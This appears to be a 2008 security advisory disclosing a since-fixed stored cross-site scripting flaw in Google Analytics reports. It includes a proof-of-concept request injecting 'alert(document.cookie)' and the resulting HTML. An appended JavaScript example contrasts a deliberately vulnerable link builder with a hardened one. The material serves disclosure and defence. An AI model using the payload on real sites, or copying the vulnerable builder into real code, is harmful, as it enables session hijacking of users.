Google Analytics - Stored Cross Site Scripting Vulnerability

2008.12.08
Credit: Roberto Suggi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

======================================================================
= Google Analytics - Stored Cross Site Scripting Vulnerability
= Vendor Website:
= http://www.google.com
= Affected Version:
= -- http://www.google.com/analytics/
= Public disclosure on 8th December 2008
======================================================================

Available online at:
http://www.security-assessment.com/files/advisories/2008-12-08_Google_Analytics_Stored_Cross_Site_Scripting.pdf

== Issue Details ==

Security-Assessment.com recently conducted a security review of the Google Analytics service, provided by Google Inc. Analysis discovered a stored Cross Site Scripting (XSS) vulnerability present in the Analytics web application. A malicious user is able to inject arbitrary browser content through web sites subscribed to the Google Analytics service.

The injected script content was rendered into the Google Analytics Content Detail page, which uses an Ajax-based menu to list the URL and the number of page views of the visited pages. The following URL points to the Google Analytics Content Detail page:

URL: https://www.google.com/analytics/reporting/content_detail

Vulnerable JavaScript: goog.analytics.PropertyManager._getInstance()._broadcastChange()

== Exploit Description - Attacker ==

A malicious user visits site xxx.com, which is subscribed to the Google Analytics service and employs the Google Analytics JavaScript tracking code. The attacker performs the following request, which includes the Cross Site Scripting payload and the Google Analytics JavaScript function broadcastChange():

Malicious GET Request:
http://xxx.com/search.asp?keyword=test"); alert(document.cookie); goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test")

In the example above, the broadcastChange function is used to terminate the malicious payload injection and to make the victim's browser execute the malicious script with no errors.
The web server responds with HTTP status 200. The URL of the requested page, including the Cross Site Scripting payload, is passed to the Google Analytics service through the JavaScript tracking code. The injected script content results in the following HTML being generated by the Google Analytics Content Detail page:

<a title='/search.asp?keyword=test"); alert(document.cookie); goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test' href='javascript:goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test"); alert(document.cookie); goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test")'>/search.asp?keyword=test"); alert(document.cookie); goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test</a>

== Exploit Description - Victim ==

The victim logs into the Google Analytics service. The login page redirects the user to:
https://www.google.com/analytics/settings/

The user clicks on View Reports for their website (which was attacked with the injection described above). The user is redirected to a URL similar to:
https://www.google.com/analytics/reporting/?reset=1&id=xxxxxxx&scid=yyyyyyy

The user accesses the Content Overview section and clicks on one of the listed pages. The user is then redirected to a URL similar to the following (in this example, the user clicked on index.html):
https://www.google.com/analytics/reporting/content_detail?id=xxxxxxx&pdr=20080726-20080825&cmp=average&d1=%2Findex.html

In the Content Detail page for index.html, an Ajax-based menu lists the most visited pages and their respective page views. When the user clicks on the link of the page which was attacked, the browser executes the injected payload from the google.com domain. Eventually, the user is redirected to the Content Detail page for the search.asp?keyword=test entry.
No JavaScript errors are returned to the JavaScript console.

== Impact ==

Cross Site Scripting attacks can be used in combination with a browser exploitation framework such as BeEF, Browser Rider, Metasploit browser exploits, Backweb, Anehta, XSS Proxy and Backframe. These frameworks allow for complex JavaScript and browser-based exploit development. Other potential impacts include:

* Hijacking users' browser sessions;
* Capturing sensitive information viewed by Google Analytics users;
* Defacement of the Google Analytics website;
* Port scanning of internal user hosts;
* Directed delivery of additional browser-based exploits, such as ActiveX or URI handler exploits.

== Solution ==

Security-Assessment.com follows responsible disclosure and promptly contacted Google when the issue was first discovered. First contact with the vendor was made on the 25th August 2008. Confirmation of the vulnerability was made by Google on the 4th September 2008. On the 3rd December 2008, Google communicated to Security-Assessment.com that Google Analytics had been fixed. Security-Assessment.com performed a regression test on the same attack vector and confirmed the issue has been resolved.

== Credit ==

Discovered and advised to Google Inc. in August 2008 by Roberto Suggi Liverani of Security-Assessment.com
Personal Page: http://malerisch.net

== Greetings ==

Hello SA guys, Really L00king forward 'Hacking In The Sun'!!! ;-)

== About Security-Assessment.com ==

Security-Assessment.com is a New Zealand based world leader in web application testing, network security and penetration testing. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendors' products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. For further information on this issue or any of our service offerings, contact us.

Web Site: www.security-assessment.com

Roberto Suggi Liverani
Security-Assessment.com
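As an added example (not code from the advisory, and not Google's code), the rendering pattern the advisory's generated HTML shows, beside a hardened alternative: the function names, the data-path attribute and the sample path are assumptions, and the hardened form is a defensive design, not Google's actual fix.

```javascript
// Added example, not Google's code. Reconstructs the markup shape quoted in the
// advisory: the tracked page path was spliced unencoded into a single-quoted
// title attribute, into the string literal of a javascript: href calling
// _broadcastChange("drilldown","<path>"), and into the link text.

const ENCODE = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const DECODE = { "&amp;": "&", "&lt;": "<", "&gt;": ">", "&quot;": '"', "&#39;": "'" };

// Encodes a string for an HTML attribute value or text node.
function escapeAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENCODE[c]);
}

// Reverses escapeAttr, i.e. what the browser hands to the DOM after tokenizing.
function decodeAttr(s) {
  return s.replace(/&amp;|&lt;|&gt;|&quot;|&#39;/g, (e) => DECODE[e]);
}

// Vulnerable rendering: a double quote in `path` closes the JS string literal
// inside the javascript: URL, so whatever follows runs as script on the
// reporting origin when the link is clicked.
function buildLinkVulnerable(path) {
  const call = 'goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","' + path + '")';
  return "<a title='" + path + "' href='javascript:" + call + "'>" + path + "</a>";
}

// Hardened rendering (assumed design): no javascript: URL at all. Every slot is
// attribute-encoded and the path travels as data; a separately attached click
// handler would read el.dataset.path and pass it to _broadcastChange as a real
// function argument, so no quote in the path can terminate a string literal.
function buildLinkSafe(path) {
  const enc = escapeAttr(path);
  return "<a title='" + enc + "' href='#' data-path='" + enc + "'>" + enc + "</a>";
}

// Extracts a single-quoted attribute value the way an HTML tokenizer does:
// everything up to the next raw single quote.
function attrValue(html, name) {
  const m = html.match(new RegExp(name + "='([^']*)'"));
  return m ? m[1] : null;
}

// Counts raw quote characters; in buildLinkSafe output only the six attribute
// delimiters remain, so any extra quote means an encoding slot was missed.
function rawQuoteCount(html) {
  return (html.match(/["']/g) || []).length;
}

// Constructed sample in the advisory's shape: closes the literal, then injects.
const SAMPLE_PATH = '/search.asp?keyword=test"); /*injected*/ ("';
```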

References:

http://seclists.org/fulldisclosure/2008/Dec/0192.html

